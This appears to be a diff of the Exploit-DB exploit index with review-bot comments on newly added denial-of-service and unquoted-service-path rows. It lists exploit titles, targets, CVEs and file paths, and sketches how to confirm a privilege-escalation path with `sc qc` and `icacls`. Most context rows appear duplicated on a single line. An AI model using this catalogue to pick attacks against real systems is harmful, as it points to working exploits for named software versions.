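Review bot: the new 51102 row's title "Buffer overflow DoS" does not follow the index's title casing and wording, where the neighbouring SuperScan rows use "Buffer Overflow" and denial-of-service entries are written out as "Denial of Service" (row 14236); a title such as "SuperMailer v11.20 - Buffer Overflow (DoS)" would match the surrounding entries and the "(PoC)" / "(DoS)" suffix style used elsewhere in the dos category.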
@ -38272,6 +38292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows,,2009-08-04,2017-04-01,1,OSVDB-64560;CVE-2009-4867,,,,, 9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows,,2009-08-04,2017-04-01,1,OSVDB-64560;CVE-2009-4867,,,,,
9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows,,2009-09-13,,1,OSVDB-58882;CVE-2009-3574,,,,, 9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows,,2009-09-13,,1,OSVDB-58882;CVE-2009-3574,,,,,
14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows,,2010-08-19,2010-08-19,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14689.png,http://www.exploit-db.comTuniac_Setup_100723.exe, 14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows,,2010-08-19,2010-08-19,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14689.png,http://www.exploit-db.comTuniac_Setup_100723.exe,
51114,exploits/windows/dos/51114.c,"Tunnel Interface Driver - Denial of Service",2023-03-28,ExAllocatePool2,dos,windows,,2023-03-28,2023-03-28,0,,,,,,
11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows,,2010-01-12,2011-01-05,1,OSVDB-61671,,,http://www.exploit-db.com/screenshots/idlt11500/screen-shot-2011-01-04-at-83246-pm.png,http://www.exploit-db.comtbftpsrv1.00.712.exe, 11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows,,2010-01-12,2011-01-05,1,OSVDB-61671,,,http://www.exploit-db.com/screenshots/idlt11500/screen-shot-2011-01-04-at-83246-pm.png,http://www.exploit-db.comtbftpsrv1.00.712.exe,
3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows,,2007-02-19,2016-09-27,1,OSVDB-33782;CVE-2007-1080;OSVDB-33752;CVE-2007-1075;OSVDB-33751,,,,, 3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows,,2007-02-19,2016-09-27,1,OSVDB-33782;CVE-2007-1080;OSVDB-33752;CVE-2007-1075;OSVDB-33751,,,,,
23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows,,2012-12-09,2012-12-09,0,CVE-2012-5451;OSVDB-88274;OSVDB-88174,,,,http://www.exploit-db.comtvmobili-windows-i386.exe,https://www.htbridge.com/advisory/HTB23120 23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows,,2012-12-09,2012-12-09,0,CVE-2012-5451;OSVDB-88274;OSVDB-88174,,,,http://www.exploit-db.comtvmobili-windows-i386.exe,https://www.htbridge.com/advisory/HTB23120
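Review bot: the new 51114 row's description "Tunnel Interface Driver - Denial of Service" carries no version, build or affected Windows release, whereas every adjacent row (Tuniac, TurboFTP, TVMOBiLi) pins the vulnerable version in the title; without it the index cannot tell readers which driver build the C proof of concept targets, so the affected version should be added to the description or, if genuinely unknown, stated in the entry's notes.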
@ -38402,6 +38423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)",2016-09-19,"Google Security Research",dos,windows,,2016-09-19,2016-09-19,1,CVE-2016-7083,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=849 40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)",2016-09-19,"Google Security Research",dos,windows,,2016-09-19,2016-09-19,1,CVE-2016-7083,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=849
42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows,,2017-06-08,2017-06-08,1,CVE-2017-4916,,,,, 42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows,,2017-06-08,2017-06-08,1,CVE-2017-4916,,,,,
44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,,2018-04-25,2018-04-25,0,,Pwn2Own,,,,https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ 44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,,2018-04-25,2018-04-25,0,,Pwn2Own,,,,https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
51100,exploits/windows/dos/51100.txt,"VMware Workstation 15 Pro - Denial of Service",2023-03-28,"Milad karimi",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows,,2008-08-17,2016-12-20,1,OSVDB-48051;CVE-2008-3761,,,,, 6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows,,2008-08-17,2016-12-20,1,OSVDB-48051;CVE-2008-3761,,,,,
15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows,,2010-09-25,2010-09-26,1,,,,,, 15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows,,2010-09-25,2010-09-26,1,,,,,,
21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows,,2001-12-07,2012-09-09,1,CVE-2001-0952;OSVDB-10605,,,,,https://www.securityfocus.com/bid/3651/info 21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows,,2001-12-07,2012-09-09,1,CVE-2001-0952;OSVDB-10605,,,,,https://www.securityfocus.com/bid/3651/info
@ -39615,6 +39637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows,,1999-02-09,2012-06-16,1,CVE-1999-0372;OSVDB-11490,,,,,https://www.securityfocus.com/bid/228/info 19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows,,1999-02-09,2012-06-16,1,CVE-1999-0372;OSVDB-11490,,,,,https://www.securityfocus.com/bid/228/info
38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,,2015-10-21,2015-10-21,0,OSVDB-129366,,,,http://www.exploit-db.comHandyPassword.exe, 38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,,2015-10-21,2015-10-21,0,OSVDB-129366,,,,http://www.exploit-db.comHandyPassword.exe,
50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",2021-12-06,"Mert Daş",local,windows,,2021-12-06,2021-12-06,0,,,,,, 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",2021-12-06,"Mert Daş",local,windows,,2021-12-06,2021-12-06,0,,,,,,
51105,exploits/windows/local/51105.txt,"HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows,,2015-08-07,2015-08-07,1,OSVDB-125529,"Metasploit Framework (MSF)",,,http://www.exploit-db.comHoMM3_HD_Latest.exe, 37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows,,2015-08-07,2015-08-07,1,OSVDB-125529,"Metasploit Framework (MSF)",,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,,2015-07-29,2015-08-07,1,,,,,http://www.exploit-db.comHoMM3_HD_Latest.exe, 37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,,2015-07-29,2015-08-07,1,,,,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,,2016-05-16,2016-05-16,0,,,,,, 39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,,2016-05-16,2016-05-16,0,,,,,,
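Review bot: row 51105 records an unquoted service path for HDD Health 4.2.0.112 with verified=0 and no application_url, whereas the reproduced entries around it (38504 HandyPassword, 37737 and 37716 Heroes of Might and Magic III) link the installer that was tested; an unquoted path is only a local privilege escalation when a directory on that path is writable by an unprivileged user and the service runs as a privileged account, so before this row is flipped to verified=1 the 51105.txt should show the `sc qc HDDHealth` output (an unquoted BINARY_PATH_NAME containing spaces, and the SERVICE_START_NAME) together with the `icacls` result for the parent directories, and the row should carry the download link of the build that was checked. The sort position (after 'HCL Lotus Notes V12', before 'Heroes of Might and Magic III') and the 17-column layout match the rest of the file.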
@ -40908,6 +40931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,,2017-06-05,2018-07-20,1,CVE-2017-9355,,,http://www.exploit-db.com/screenshots/idlt42500/42119.png,http://www.exploit-db.comSubsonic.exe, 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,,2017-06-05,2018-07-20,1,CVE-2017-9355,,,http://www.exploit-db.com/screenshots/idlt42500/42119.png,http://www.exploit-db.comSubsonic.exe,
17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows,,2011-04-29,2011-04-29,1,OSVDB-72050,"Metasploit Framework (MSF)",,,http://www.exploit-db.comSubtitleProcessor771.zip, 17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows,,2011-04-29,2011-04-29,1,OSVDB-72050,"Metasploit Framework (MSF)",,,http://www.exploit-db.comSubtitleProcessor771.zip,
17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows,,2011-04-27,2011-04-27,1,OSVDB-72050,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-26-at-82906-pm.png,http://www.exploit-db.comSubtitleProcessor771.zip, 17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows,,2011-04-27,2011-04-27,1,OSVDB-72050,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-26-at-82906-pm.png,http://www.exploit-db.comSubtitleProcessor771.zip,
51106,exploits/windows/local/51106.txt,"SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2010-1423;CVE-2010-0886;OSVDB-63648,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2010-1423;CVE-2010-0886;OSVDB-63648,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows,,2013-07-23,2013-08-05,1,,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-05-at-50823-pm.png,http://www.exploit-db.comsetup_3500.exe, 27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows,,2013-07-23,2013-08-05,1,,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-05-at-50823-pm.png,http://www.exploit-db.comsetup_3500.exe,
13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow",2010-06-08,mr_me,local,windows,,2010-06-07,,1,,,,,, 13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow",2010-06-08,mr_me,local,windows,,2010-06-07,,1,,,,,,
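Review bot: row 51106 quotes the service as 'SugarSync Service', and because the file's convention (see 'HDDHealth' in the same commit, 'SugarSync Service' here) is to quote the service name, the .txt should state whether that string is the service key name or only the display name, since `sc qc` needs the key name and a reader reproducing the finding will try it first; like 51105 the row ships with verified=0, no codes and no application_url, unlike the neighbouring 17225/17217 and 27041 rows which carry an application_url and a screenshot. Separately, the context lines in this hunk show pre-existing application_url values with no separator between host and file name ("http://www.exploit-db.comSubtitleProcessor771.zip", "http://www.exploit-db.comsetup_3500.exe"); that is not introduced by this commit and should be fixed in a follow-up rather than mixed into this one.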